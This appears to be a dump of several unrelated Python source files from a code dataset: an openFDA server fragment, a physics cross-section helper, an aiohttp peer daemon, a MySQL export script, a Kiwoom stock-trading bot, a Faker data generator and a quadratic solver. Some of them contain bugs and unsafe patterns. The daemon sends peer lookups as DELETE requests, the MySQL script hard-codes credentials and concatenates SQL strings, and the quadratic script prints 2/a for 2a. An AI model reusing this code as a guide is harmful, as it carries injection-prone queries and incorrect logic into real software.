self.send_header('Content-type', 'text/html')\n self.end_headers()\n with open(\"error.html\", \"r\") as f:\n file = f.read()\n self.wfile.write(bytes(file, \"utf8\"))\n\n except KeyError as ex:\n self.send_response(404)\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n with open(\"error.html\", \"r\") as f:\n file = f.read()\n self.wfile.write(bytes(file, \"utf8\"))\n\n return\n\nHandler = testHTTPRequestHandler\n\nhttpd = socketserver.TCPServer((IP, PORT), Handler)\nprint(\"serving at port\", PORT)\ntry:\n httpd.serve_forever()\nexcept KeyboardInterrupt:\n pass\nhttpd.server_close()\n","sub_path":"openfda-project/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":4834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"176452218","text":"#/usr/bin/env python\n#-*- Coding: UTF-8 -*-\n\n__author__ = \"Lianjin WU \"\n__copyright__ = \"Copyright (c) Lianjin WU\"\n__created__ = \"[2020-11-06 Fri 23:18]\"\n\nimport ROOT as root\nimport math\n\nclass xs_func():\n def __init__(self, nbin, lower, upper, mass0 = 0.13957, mass1 = 0.13957, mass2 = 3.7737):\n \"\"\" bin, lower, upper limits for PHSP factor, three particle masses \"\"\"\n self._gr = root.TGraph()\n for ibin in range(nbin):\n m0 = lower + ibin*(upper - lower)/float(nbin)\n self._gr.SetPoint(ibin, lower + ibin*(upper - lower)/float(nbin), self.__getPHSPFactor(m0, mass0, mass1, mass2))\n\n ### three body PHSP function for TF1\n def __integralPHSPFunc(self, x, par):\n xx = x[0]\n e2star = (xx-par[1]*par[1]+par[2]*par[2])/(2*math.sqrt(xx))\n e3star = (par[0]*par[0]-xx-par[3]*par[3])/(2*math.sqrt(xx))\n func1 = math.sqrt(e2star*e2star-par[2]*par[2])\n func2 = math.sqrt(e3star*e3star-par[3]*par[3])\n fmax = -(func1-func2)*(func1-func2)\n fmin = -(func1+func2)*(func1+func2)\n func = fmax-fmin\n return func\n\n ### three body PHSP factor calculation based on TF1\n ### m0 -> m1 + m2 + m3\n def __getPHSPFactor(self, m0, m1, m2, m3):\n xmin = (m1+m2)*(m1+m2)\n xmax = (m0-m3)*(m0-m3)\n tf1 = root.TF1(\"f1%s\"%(str(m0).replace(\".\", \"\")), self.__integralPHSPFunc, xmin, xmax, 4)\n tf1.SetParameters(m0, m1, m2, m3)\n return tf1.Integral(xmin, xmax)\n\n ### PHSP facor Graph\n def getPHSPFactorGraph(self):\n return self._gr\n\n ### PHSP factor\n def getPHSPFactor(self, energy):\n return self._gr.Eval(energy)\n\n ### defined BW (PHSP factors are considered) \n def getOneBreitWigner(self, xx, mass, width, eewidth, minMotherEnergy):\n \"\"\" minMotherEnergy = m1 + m2 + m3\"\"\"\n if mass < minMotherEnergy or xx < minMotherEnergy or width < 0.0 or eewidth < 0.0: \n return complex(0.0, 0.0)\n\n left = mass / xx\n right = math.sqrt(self._gr.Eval(xx) / self._gr.Eval(mass))\n numerator = math.sqrt(12.0*math.pi*width*eewidth)\n denominator = complex(xx*xx-mass*mass, mass*width)\n middle = numerator/denominator\n \n return left*middle*right\n\n def getPHSP(self, xx):\n return self._gr.Eval(xx)\n\n ### defined correlated N BW (PHSP factors are included)\n def getCorrelatedBreitWigners(self, xx, resonances, minMotherEnergy):\n \"\"\" minMotherEnergy = m1 + m2 + m3 \n resonance: [mass, width, eewidth, phi] \"\"\"\n bw = complex(0.0, 0.0)\n for resonance in resonances:\n mass, width, eewidth, phi = resonance\n bw = bw + self.getOneBreitWigner(xx, mass, width, eewidth, minMotherEnergy)*(complex(math.cos(phi), math.sin(phi)))\n return bw\n \n ### defined exp(i*phi) = cos(phi) + i*sin(phi)\n def getExpIPhi(self, phi):\n \"\"\" exp(i*phi) = cos(phi) + i*sin(phi) \"\"\"\n return complex(math.cos(phi), math.sin(phi))\n","sub_path":"python/sys_err/ISR/sample/tools/xs_func_three_body.py","file_name":"xs_func_three_body.py","file_ext":"py","file_size_in_byte":3026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"255482097","text":"from aiohttp import web\nimport aiohttp\nimport asyncio\nimport aiofiles\nimport os\nimport yaml\n\nclass Daemon():\n def __init__(self, config):\n with open(config, 'r') as cfg:\n try:\n data = yaml.load(cfg)\n self.port = data['port']\n if data['directory']:\n self.path = data['directory'] + '/'\n self.path_read = self.path\n else:\n self.path = '.'\n self.path_read = ''\n self.node_list = data['node_list']\n self.save_flag = data['save']\n except yaml.YAMLError as exc:\n print(exc)\n self.run()\n\n def run(self):\n daemon = web.Application()\n daemon.add_routes([\n web.get('/{name}', self.handle_get),\n web.delete('/{name}', self.handle_delete),\n ])\n web.run_app(daemon, port=self.port)\n\n async def check(self, request):\n name = request.match_info.get('name')\n text = ''\n if name in os.listdir(self.path):\n async with aiofiles.open(self.path_read + name) as f:\n text = await f.read()\n return text, name\n\n async def handle_get(self, request):\n text, name = await self.check(request)\n if not text:\n async with aiohttp.ClientSession() as session:\n futures = []\n for node in self.node_list:\n futures.append(session.delete(f\"http://{node['host']}:{node['port']}/{name}\"))\n for future in asyncio.as_completed(futures):\n resp = await future\n text = await resp.text()\n if text:\n break\n if text:\n if self.save_flag:\n async with aiofiles.open(self.path_read + name, 'w') as f:\n await f.write(text)\n return web.Response(text=text)\n return web.Response(status=404)\n\n async def handle_delete(self, request):\n text, _ = await self.check(request)\n return web.Response(text=text)\n\n\nDaemon(\"config.yml\")\n","sub_path":"daemon.py","file_name":"daemon.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"636962735","text":"#coding=utf-8\nimport MySQLdb\n\nconn= MySQLdb.connect(\n host='localhost',\n port = 3306,\n\tuser='lin',\n\tpasswd='lin',\n\tdb ='testDB',\n)\ncur = conn.cursor()\ncur2 = conn.cursor()\n#获得表中有多少条数据\naa=cur.execute(\"select rno,rname,introduction,remark from recipe\")\n\n#打印表中的多少数据\nfp = open('aaa.csv','w')\ninfo = cur.fetchmany(aa)\nfor i in info:\n\tfp.write(i[0]+\",\"+i[1]+\",\"+i[2]+\",\"+i[3]+\",\")\n\tbb = cur2.execute(\"select Group_concat(label) from recipelabel where rno='\"+i[0]+\"'\")\n\tinfo2 = cur2.fetchmany(bb)\n\tif info2[0][0]:\n\t\tfp.write(info2[0][0]+\",\")\n\n\n\tbb = cur2.execute(\"select Group_concat(stepdetail) from recipestep where rno='\"+i[0]+\"'\")\n\tinfo2 = cur2.fetchmany(bb)\n\tif info2[0][0]:\n\t\tfp.write(info2[0][0]+\",\")\n\n\n\tbb = cur2.execute(\"select Group_concat(material) from recipematerial where rno='\"+i[0]+\"'\")\n\tinfo2 = cur2.fetchmany(bb)\n\tif info2[0][0]:\n\t\tfp.write(info2[0][0]+\"\\n\")\n\ncur.close()\nconn.commit()\nconn.close()\n","sub_path":"db_data/showData.py","file_name":"showData.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"451856399","text":"import sys\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QAxContainer import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import *\nimport datetime\nfrom config.errCode import *\nfrom slack.slack import *\n\n\nclass MyWindow(QMainWindow):\n def __init__(self):\n super().__init__()\n self.setGeometry(300, 300, 500, 300)\n self.setWindowTitle(\"변동성 돌파전략\")\n self.symbol_list = [\"233740\", \"251340\", \"122630\", \"252670\"]\n self.symbol_dict = {} # [name, range, target, hold, quantity, target_quantity]\n self.bought_list = set([])\n self.target_buy_count = len(self.symbol_list) if len(self.symbol_list) < 5 else 5\n self.buy_percent = 1 / self.target_buy_count\n\n for symbol in self.symbol_list:\n self.symbol_dict[symbol] = [\"\", 0, 0, False, 0, 0]\n\n self.amount = None\n self.account = None\n self.on_market = None # \"0\": 장 시작 전, \"3\": 장 중, \"2\": 장후 동시호가, \"4\": �� 마감\n self.on_trade = 0 # 0: 09:05 전, 1: 09:05~15:15, 2: 15:15 이후\n\n self.t_now = datetime.datetime.now()\n self.t_9 = self.t_now.replace(hour=9, minute=0, second=0, microsecond=0)\n self.t_start = self.t_now.replace(hour=9, minute=5, second=0, microsecond=0)\n self.t_sell = self.t_now.replace(hour=15, minute=15, second=0, microsecond=0)\n self.t_day = datetime.datetime.today().weekday()\n\n self.plain_text_edit = QPlainTextEdit(self)\n self.plain_text_edit.setReadOnly(True)\n self.plain_text_edit.move(10, 10)\n self.plain_text_edit.resize(480, 280)\n\n self.timer = QTimer(self)\n self.timer.start(10000)\n self.timer.setInterval(3000)\n self.timer.timeout.connect(self.timeout_run)\n\n self.timer_ten = QTimer(self)\n ten_minute = 1000 * 60 * 10 * 3\n self.timer_ten.start(10000)\n self.timer_ten.setInterval(ten_minute)\n self.timer_ten.timeout.connect(self.timeout_ten)\n\n self.ocx = QAxWidget(\"KHOPENAPI.KHOpenAPICtrl.1\")\n self.ocx.OnEventConnect.connect(self._handler_login)\n self.ocx.OnReceiveTrData.connect(self._handler_tr_data)\n self.ocx.OnReceiveRealData.connect(self._handler_real_data)\n self.ocx.OnReceiveChejanData.connect(self._handler_chejan_data)\n\n self.login_event_loop = QEventLoop()\n self.CommConnect() # 로그인이 될 때까지 대기\n self.run(self.symbol_list)\n\n def CommConnect(self):\n self.ocx.dynamicCall(\"CommConnect()\")\n self.login_event_loop.exec_()\n\n def run(self, symbol_list):\n accounts = self.GetLoginInfo(\"ACCNO\")\n self.account = accounts.split(\";\")[1]\n self.plain_text_edit.appendPlainText(f\"현재 계좌번호: {self.account}\")\n\n self.subscribe_market_time(\"1\")\n\n self.request_opw00004() # 계좌 평가 현황 조회\n self.request_opt10075() # 미체결 조회\n\n for i, symbol in enumerate(self.symbol_list):\n self.subscribe_stock_conclusion(str(i + 1), symbol)\n\n for symbol in symbol_list:\n self.request_opt10081(symbol) # 종목 별 전일 정보 조회\n self.request_opw00001() # 예수금 조회\n\n today = self.get_today()\n to_slack(today + \" 주가 조회 시작\")\n\n def get_today(self):\n today = self.t_now.strftime(\"%Y%m%d %H:%M\")\n return today\n\n def timeout_run(self):\n self.t_now = datetime.datetime.now()\n if self.t_day == (5 or 6):\n print(\"오늘은 \", \"토요일\" if self.t_day == 5 else \"일요일\", \"입니다.\")\n QCoreApplication.instance().quit()\n if self.t_9 < self.t_now < self.t_start:\n self.on_trade = 0\n if self.bought_list:\n self.sell_all(self.bought_list)\n self.plain_text_edit.appendPlainText(\"전일 보유량 시장가 매도 완료\")\n elif self.t_sell < self.t_now:\n self.on_trade = 2\n if self.bought_list:\n self.sell_all(self.bought_list)\n self.plain_text_edit.appendPlainText(\"금일 매수량 시장가 매도 완료\")\n elif self.t_start < self.t_now < self.t_sell:\n self.on_trade = 1\n\n def timeout_ten(self):\n if self.on_trade == 1:\n today = self.get_today()\n info = f\"{today} 주식 현재가 감시중\"\n self.plain_text_edit.appendPlainText(info)\n to_slack(info) # slack 감시중 확인\n\n def GetLoginInfo(self, tag):\n data = self.ocx.dynamicCall(\"GetLoginInfo(QString)\", tag)\n return data\n\n def _handler_login(self, err_code):\n if err_code == 0:\n self.plain_text_edit.appendPlainText(\"로그인 완료\")\n else:\n if err_code == -106: # 사용자가 강제로 키움api 프로그램을 종료하였을 경우\n print(\"에러 내용 :\", errors(err_code)[1])\n QCoreApplication.instance().quit()\n print(\"로그인에 실패하였습니다.\")\n print(\"에러 내용 :\", errors(err_code)[1])\n QCoreApplication.instance().quit()\n self.login_event_loop.exit()\n\n def _handler_tr_data(self, screen_no, rqname, trcode, record, next):\n if rqname == \"예수금조회\":\n 주문가능금액 = self.GetCommData(trcode, rqname, 0, \"주문가능금액\")\n 주문가능금액 = int(주문가능금액)\n if self.bought_list:\n self.target_buy_count = (\n len(self.symbol_list) if len(self.symbol_list) < 5 else 5\n ) - len(self.bought_list)\n self.buy_percent = 1 / self.target_buy_count\n self.amount = int(주문가능금액 * (self.buy_percent))\n self.plain_text_edit.appendPlainText(f\"주문가능금액: {주문가능금액} 1종목당 투자금액: {self.amount}\")\n\n elif rqname == \"계좌평가현황\":\n rows = self.GetRepeatCnt(trcode, rqname)\n for i in range(rows):\n 종목코드 = self.GetCommData(trcode, rqname, i, \"종목코드\")[1:]\n 보유수량 = self.GetCommData(trcode, rqname, i, \"보유수량\")\n self.bought_list.add(종목코드)\n self.sadddict[종목코드][3] = True\n self.symbol_dict[종목코드][4] = int(보유수량)\n\n elif rqname == \"실시간미체결요청\":\n rows = self.GetRepeatCnt(trcode, rqname)\n for i in range(rows):\n 종목코드 = self.GetCommData(trcode, rqname, i, \"종목코드\")\n 종목명 = self.GetCommData(trcode, rqname, i, \"종목명\")\n 주문수량 = self.GetCommData(trcode, rqname, i, \"주문수량\")\n 미체결수량 = self.GetCommData(trcode, rqname, i, \"미체결수량\")\n self.symbol_dict[종목코드][3] = True\n self.symbol_dict[종목코드][4] = int(주문수량 - 미체결수량)\n self.plain_text_edit.appendPlainText(f\"{종목명} {미체결수량}/{주문수량} 미체결\")\n\n elif rqname == \"매수\":\n pass\n\n elif rqname == \"매도\":\n pass\n\n else:\n t_now = datetime.datetime.now()\n today = t_now.strftime(\"%Y%m%d\")\n 일자 = self.GetCommData(trcode, rqname, 0, \"일자\")\n\n # 장시작 후 TR 요청하는 경우 0번째 row에 당일 일봉 데이터가 존재함\n if 일자 != today:\n 고가 = self.GetCommData(trcode, rqname, 0, \"고가\")\n 저가 = self.GetCommData(trcode, rqname, 0, \"저가\")\n else:\n 일자 = self.GetCommData(trcode, rqname, 1, \"일자\")\n 고가 = self.GetCommData(trcode, rqname, 1, \"고가\")\n 저가 = self.GetCommData(trcode, rqname, 1, \"저가\")\n\n prev_day_range = int(고가) - int(저가)\n self.symbol_dict[rqname][1] = prev_day_range\n info = (\n f\"{self.symbol_dict[rqname][0]} 일자: {일자} 고가: {고가} 저가: {저가} 전일변동: {prev_day_range}\"\n )\n self.plain_text_edit.appendPlainText(info)\n\n def GetRepeatCnt(self, trcode, rqname):\n ret = self.ocx.dynamicCall(\"GetRepeatCnt(QString, QString)\", trcode, rqname)\n return ret\n\n def GetMasterCodeName(self, code):\n name = self.ocx.dynamicCall(\"GetMasterCodeName(QString)\", code)\n return name\n\n def request_opt10081(self, target_code):\n now = datetime.datetime.now()\n today = now.strftime(\"%Y%m%d\")\n self.SetInputValue(\"종목코드\", target_code)\n self.SetInputValue(\"기준일자\", today)\n self.SetInputValue(\"수정주가구분\", 1)\n self.CommRqData(target_code, \"opt10081\", 0, \"9000\")\n\n def request_opw00001(self):\n self.SetInputValue(\"계좌번호\", self.account)\n self.SetInputValue(\"비밀번호\", \"\")\n self.SetInputValue(\"비밀번호입력매체구분\", \"00\")\n self.SetInputValue(\"조회구분\", 2)\n self.CommRqData(\"예수금조회\", \"opw00001\", 0, \"9001\")\n\n def request_opw00004(self):\n self.SetInputValue(\"계좌번호\", self.account)\n self.SetInputValue(\"비밀번호\", \"\")\n self.SetInputValue(\"상장폐지조회구분\", 0)\n self.SetInputValue(\"비밀번호입력매체구분\", \"00\")\n self.CommRqData(\"계좌평가현황\", \"opw00004\", 0, \"9002\")\n\n def request_opt10075(self):\n self.SetInputValue(\"계좌번호\", self.account)\n self.SetInputValue(\"전체종목구분\", \"0\")\n self.SetInputValue(\"매매구분\", \"2\")\n self.SetInputValue(\"체결구분\", \"1\")\n self.CommRqData(\"실시간미체결요청\", \"opt10075\", 0, \"9003\")\n\n # 실시간 타입을 위한 메소드\n def SetRealReg(self, screen_no, code_list, fid_list, real_type):\n self.ocx.dynamicCall(\n \"SetRealReg(QString, QString, QString, QString)\",\n screen_no,\n code_list,\n fid_list,\n real_type,\n )\n\n def GetCommRealData(self, code, fid):\n data = self.ocx.dynamicCall(\"GetCommRealData(QString, int)\", code, fid)\n return data\n\n def DisConnectRealData(self, screen_no):\n self.ocx.dynamicCall(\"DisConnectRealData(QString)\", screen_no)\n\n # 실시간 이벤트 처리 핸들러\n def _handler_real_data(self, code, real_type, real_data):\n if real_type == \"장시작시간\":\n 장운영구분 = self.GetCommRealData(code, 215)\n if 장운영구분 == (\"2\" or \"4\"):\n QCoreApplication.instance().quit()\n print(\"장 종료 - 프로그램 종료\")\n self.on_market = 장운영구분\n\n elif real_type == \"���식체결\":\n if self.on_trade == 1:\n if len(self.bought_list) >= self.target_buy_count:\n # add 목표 수량보다 많을 경우 pass\n pass\n else:\n # 현재가\n 현재가 = self.GetCommRealData(code, 10)\n 현재가 = abs(int(현재가)) # +100, -100\n 체결시간 = self.GetCommRealData(code, 20)\n\n # 목표가 계산\n # TR 요청을 통한 전일 range가 계산되었고 아직 당일 목표가가 계산되지 않았다면\n if self.symbol_dict[code][1] != 0 and self.symbol_dict[code][2] == 0:\n 시가 = self.GetCommRealData(code, 16)\n 시가 = abs(int(시가)) # +100, -100\n code_target = int(시가 + (self.symbol_dict[code][1] * 0.4))\n self.symbol_dict[code][2] = code_target\n self.plain_text_edit.appendPlainText(\n f\"{self.symbol_dict[code][0]} 목표가 계산됨: {code_target}\"\n )\n\n # 매수시도\n # 당일 매수하지 않았고\n # TR 요청과 Real을 통한 목표가가 설정되었고\n # TR 요청을 통해 잔고조회가 되었고\n # 현재가가 목표가가 이상이면\n if (\n self.symbol_dict[code][3] is False\n and self.symbol_dict[code][2]\n and self.amount is not None\n and 현재가 >= self.symbol_dict[code][2]\n ):\n self.symbol_dict[code][3] = True\n quantity = int(self.amount / 현재가)\n self.symbol_dict[code][5] = quantity\n self.SendOrder(\"매수\", \"8000\", self.account, 1, code, quantity, 0, \"03\", \"\")\n info = f\"{self.symbol_dict[code][0]} 시간: {체결시간} 목표가: {self.symbol_dict[code][2]} 현재가: {현재가} 시장가 매수 진행 수량: {quantity}\"\n self.plain_text_edit.appendPlainText(info)\n to_slack(info)\n\n def _handler_chejan_data(self, gubun, item_cnt, fid_list):\n if gubun == \"1\": # 잔고통보'\n 매수매도구분 = self.GetChejanData(\"946\")\n if 매수매도구분 == \"2\": # 매수 잔고 변동\n 종목코드 = self.GetChejanData(\"9001\")[1:]\n 종목명 = self.GetChejanData(\"302\").strip()\n 보유수량 = self.GetChejanData(\"930\")\n 매입단가 = self.GetChejanData(\"931\")\n self.symbol_dict[종목코드][4] = int(보유수량)\n self.bought_list.add(종목코드)\n self.plain_text_edit.appendPlainText(f\"{종목명} 매입단가: {매입단가} 보유수량: {보유수량}\")\n if self.symbol_dict[종목코드][4] == self.symbol_dict[종목코드][5]:\n to_slack(\n f\"{종목명} 목표가: {self.symbol_dict[종목코드][2]} 매입단가: {매입단가} 수량: {보유수량} 체결 완료\"\n )\n elif 매수매도구분 == \"1\": # 매도 잔고 변동\n pass\n\n def sell_all(self, bought_list):\n today = self.get_today()\n to_slack(today + \" 전량 매도 진행\")\n for symbol in bought_list:\n self.SendOrder(\n \"매도\",\n \"8001\",\n self.account,\n 2,\n symbol,\n self.symbol_dict[symbol][4],\n 0,\n \"03\",\n \"\",\n )\n self.symbol_dict[symbol][3] = False\n self.symbol_dict[symbol][4] = 0\n self.bought_list = set([])\n\n def subscribe_stock_conclusion(self, screen_no, symbol):\n self.SetRealReg(screen_no, symbol, \"20\", 1)\n name = self.GetMasterCodeName(symbol)\n self.symbol_dict[symbol][0] = name\n self.plain_text_edit.appendPlainText(f\"{name} 주식체결 구독신청\")\n\n def subscribe_market_time(self, screen_no):\n self.SetRealReg(screen_no, \"\", \"215\", 0)\n self.plain_text_edit.appendPlainText(\"장시작시간 구독신청\")\n\n # TR 요청을 위한 메소드\n def SetInputValue(self, id, value):\n self.ocx.dynamicCall(\"SetInputValue(QString, QString)\", id, value)\n\n def CommRqData(self, rqname, trcode, next, screen_no):\n self.ocx.dynamicCall(\n \"CommRqData(QString, QString, int, QString)\",\n rqname,\n trcode,\n next,\n screen_no,\n )\n\n def GetCommData(self, trcode, rqname, index, item):\n data = self.ocx.dynamicCall(\n \"GetCommData(QString, QString, int, QString)\", trcode, rqname, index, item\n )\n return data.strip()\n\n def SendOrder(self, rqname, screen, accno, order_type, code, quantity, price, hoga, order_no):\n self.ocx.dynamicCall(\n \"SendOrder(QString, QString, QString, int, QString, int, int, QString, QString)\",\n [rqname, screen, accno, order_type, code, quantity, price, hoga, order_no],\n )\n\n def GetChejanData(self, fid):\n data = self.ocx.dynamicCall(\"GetChejanData(int)\", fid)\n return data\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n window = MyWindow()\n window.show()\n app.exec_()\n","sub_path":"KiwoomAPI/kiwoom_ver1.2.py","file_name":"kiwoom_ver1.2.py","file_ext":"py","file_size_in_byte":16431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"139875671","text":"import random\n\n'''faker伪数据库支持方法'''\nTEMPLATES = {\n 'Id NO.': 'INT',\n 'First Name': 'VARCHAR(50)', # 名\n 'Last Name': 'VARCHAR(50)', # 姓\n 'Email Address': 'VARCHAR(150)', # 邮箱\n 'Gender': 'VARCHAR(50)', # 性别\n 'IP Address V4': 'VARCHAR(150)', # 随机IP4地址\n # \"地理信息伪数据\"\n 'City': 'VARCHAR(500)', # 城市\n 'Country': 'VARCHAR(500)', # 国家\n 'Country Code': 'VARCHAR(50)', # 国家编码\n # 'Area'district: 'VARCHAR(100)', # 仅支持中国\n 'Latitude': 'VARCHAR(150)', # 地理坐标:纬度\n 'Longitude': 'VARCHAR(150)', # 地理坐标:经度\n 'Postcode': 'VARCHAR(150)', # 邮编\n # 'Province'province: 'VARCHAR(100)', # 台湾,美国没有\n 'Address': 'VARCHAR(500)', # 详细地址\n 'Street Address': 'VARCHAR(500)', # 街道地址\n 'Street Name': 'VARCHAR(200)', # 街道名\n 'Street Suffix': 'VARCHAR(200)', # 街、路\n 'Building NO.': 'VARCHAR(200)', # 楼牌号 eg:'B座'\n\n # \"基础信息伪数据\"\n 'SSN': 'VARCHAR(100)', # SSN号\n 'Service Business': 'VARCHAR(500)', # 随机公司服务行业\n 'Company Name': 'VARCHAR(500)', # 随机公司名\n 'Card Info': 'VARCHAR(500)', # 生成完整信用卡信息\n 'Card NO.': 'VARCHAR(150)', # 生成信用卡号\n 'Card Type': 'VARCHAR(100)', # 信用卡类型\n 'Card Security Code': 'VARCHAR(100)', # 信用卡安全码\n 'Job': 'VARCHAR(200)', # 职位\n\n\n 'First Name(Female)': 'VARCHAR(50)', # 女性 名\n 'First Name(Male)': 'VARCHAR(50)', # 男性 名\n 'Last Name(Female)': 'VARCHAR(50)', # 女性\n 'Last Name(Male)': 'VARCHAR(50)', # 男性\n 'Full Name': 'VARCHAR(100)', # 随机生成全名\n 'Male Name': 'VARCHAR(100)', # 男性全名\n 'Female Name': 'VARCHAR(100)', # 女性全名\n 'ISDN NO.': 'VARCHAR(100)', # 移动台国际用户识别码,即移动用户的ISDN号码\n 'Phone NO.': 'VARCHAR(100)', # 随机生成电话号\n 'NO. Segment(Phone)': 'VARCHAR(100)', # 随机生成手机号段如'139'\n\n # \"网络基础信息伪数据\"\n 'Domain Name': 'VARCHAR(200)', # 生成域名\n\n 'IP Address V6': 'VARCHAR(100)', # 随机IP6地址\n 'MAC Address': 'VARCHAR(100)', # 随机MAC地址\n 'URI Address': 'VARCHAR(500)', # 随机URI地址\n 'URL Address': 'VARCHAR(500)', # 随机URL地址\n 'User Name': 'VARCHAR(100)', # 随机用户名\n\n # \"浏览器信息伪数据\"\n 'User Agent': 'VARCHAR(500)', # 随机user_agent信息\n\n # \"文件信息伪数据\"\n 'File Type': 'VARCHAR(50)', # 随机文件扩展名如'avi','txt'\n 'File Name': 'VARCHAR(100)', # 随机文件名(包含扩展名,不包含路径)\n 'File Path': 'VARCHAR(200)', # 随机文件路径(包含文件名,扩展名)\n 'Mime Type': 'VARCHAR(100)', # 随机mime Type\n}\n\n\n\n'''调用生成数据方法'''\ndef data_generator(field, fake_obj):\n if field == 'Id NO.':\n return fake_obj.random_int()\n if field == 'First Name':\n return fake_obj.first_name()\n if field == 'Last Name':\n return fake_obj.last_name()\n if field == 'Email Address':\n return fake_obj.email()\n if field == 'Gender':\n return random.choice(['Female', 'Male', 'Non-binary'])\n if field == 'IP Address V4':\n return fake_obj.ipv4()\n\n if field == 'City':\n return fake_obj.city(), # 城市\n if field == 'Country':\n return fake_obj.country(), # 国家\n if field == 'Country Code':\n return fake_obj.country_code(), # 国家编码\n # 'Area': fake_obj.district(), # 仅支持中国\n if field == 'Latitude':\n return fake_obj.latitude(), # 地理坐标:纬度\n if field == 'Longitude':\n return fake_obj.longitude(), # 地理坐标:经度\n if field == 'Postcode':\n return fake_obj.postcode(), # 邮编\n # 'Province': return fake_obj.province(), # 台湾,美国没有\n if field == 'Address':\n return fake_obj.address(), # 详细地址\n if field == 'Street Address':\n return fake_obj.street_address(), # 街道地址\n if field == 'Street Name':\n return fake_obj.street_name(), # 街道名\n if field == 'Street Suffix':\n return fake_obj.street_suffix(), # 街、路\n if field == 'Building NO.':\n return fake_obj.building_number(), # 楼牌号 eg:'B座'\n\n # \"基础信息伪数据\"\n if field == 'SSN':\n return fake_obj.ssn(), # SSN号\n if field == 'Service Business':\n return fake_obj.bs(), # 随机公司服务行业\n if field == 'Company Name':\n return fake_obj.company(), # 随机公司名\n if field == 'Card Info':\n return fake_obj.credit_card_full(), # 生成完整信用卡信息\n if field == 'Card NO.':\n return fake_obj.credit_card_number(card_type=None), # 生成信用卡号\n if field == 'Card Type':\n return fake_obj.credit_card_provider(), # 信用卡类型\n if field == 'Card Security Code':\n return fake_obj.credit_card_security_code(), # 信用卡安全码\n if field == 'Job':\n return fake_obj.job(), # 职位\n\n if field == 'First Name(Female)':\n return fake_obj.first_name_female(), # 女性 名\n if field == 'First Name(Male)':\n return fake_obj.first_name_male(), # 男性 名\n if field == 'Last Name(Female)':\n return fake_obj.last_name_female(), # 女性\n if field == 'Last Name(Male)':\n return fake_obj.last_name_male(), # 男性\n if field == 'Full Name':\n return fake_obj.name(), # 随机生成全名\n if field == 'Male Name':\n return fake_obj.name_male(), # 男性全名\n if field == 'Female Name':\n return fake_obj.name_female(), # 女性全名\n if field == 'ISDN NO.':\n return fake_obj.msisdn(), # 移动台国际用户识别码,即移动用户的ISDN号码\n if field == 'Phone NO.':\n return fake_obj.phone_number(), # 随机生成电话号\n if field == 'NO. Segment(Phone)':\n return fake_obj.phonenumber_prefix(), # 随机生成手机号段如'139'\n\n # \"网络基础信息伪数据\"\n if field == 'Domain Name':\n return fake_obj.domain_name(), # 生成域名\n\n if field == 'IP Address V6':\n return fake_obj.ipv6(), # 随机IP6地址\n if field == 'MAC Address':\n return fake_obj.mac_address(), # 随机MAC地址\n if field == 'URI Address':\n return fake_obj.uri(), # 随机URI地址\n if field == 'URL Address':\n return fake_obj.url(), # 随机URL地址\n if field == 'User Name':\n return fake_obj.user_name(), # 随机用户名\n\n # \"浏览器信息伪数据\"\n if field == 'User Agent':\n return fake_obj.user_agent(), # 随机user_agent信息\n\n # \"文件信息伪数据\"\n if field == 'File Type':\n return fake_obj.file_extension(), # 随机文件扩展名如'avi','txt'\n if field == 'File Name':\n return fake_obj.file_name(), # 随机文件名(包含扩展名,不包含路径)\n if field == 'File Path':\n return fake_obj.file_path(), # 随机文件路径(包含文件名,扩展名)\n if field == 'Mime Type':\n return fake_obj.mime_type(), # 随机mime Type\n\n#\n# if __name__ == '__main__':\n# from faker.config import *\n# from faker import Factory\n# fa = Factory.create(locale='zh_CN')\n# a = fa.file_path()\n# print(a)\n# print(AVAILABLE_LOCALES)\n\n\n","sub_path":"fake.py","file_name":"fake.py","file_ext":"py","file_size_in_byte":7464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"207156402","text":"'''\nQuadratic Formula Calculator\nBy: Owen Jennings\n\n'''\n\nimport math\n\n# input values\na = float(input(\"\\n\\n\\na term: \"))\nb = float(input(\"b term: \"))\nc = float(input(\"c term: \"))\n\n\ndiscriminate = b**2 - 4*(a)*(c)\nif discriminate < 0:\n print(\"\\n\\n\\nNo Solutions!\")\nelif discriminate == 0:\n print(\"\\n\\nOnly One Solution!\")\n ans = (-(b) + (math.sqrt(discriminate))) / (2 * a)\n print(\"Solution: \" + str(ans))\nelse:\n ans = (-(b) + (math.sqrt(discriminate))) / (2 * a)\n ans2 = (-(b) - (math.sqrt(discriminate))) / (2 * a)\n print(\"\\nEquation: \" + str(-1 * b) + \" +/- √(\" + str(discriminate) + \") / \" + str(2 / a))\n print(\"Discriminate: \" + str(discriminate))\n print(\"\\n\\nAnswer rounded to the fourth digit: \")\n print(\"Solution 1: \" + str(round(ans, 4)) + \"\\nSolution 2: \" + str(round(ans2, 4)))\n\n# check if the square root is a float or integer and decide whether to display whole number or square root equation\n\n","sub_path":"quadratic.py","file_name":"quadratic.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"158966266","text":"__author__ = \"Luis Domingues\"\r\n__maintainer__ = \"Luis Domingues\"\r\n__email__ = \"luis.hmd@gmail.com\"\r\n\r\ndef init():\r\n\r\n # Ref unit is 1 bar\r\n dic_pressure = {\"pascal\":1e-5,\r\n \"kilopascal\":1e-2,\r\n \"megapascal\":10.0,\r\n \"centipascal\":1e-7,\r\n \"milipascal\":1e-8,\r\n \"atmosphere\":1.01325,\r\n \"cm H2O @4 degC\": 0.000980665,\r\n \"centitorr\":0.000013332237,\r\n \"mm Hg @0 degC\":0.0013332239,\r\n \"in Hg 32 degF\":0.0338638,\r\n \"cm H2O @ 4 degC\":0.000980638,\r\n \"mm H2O @ 4 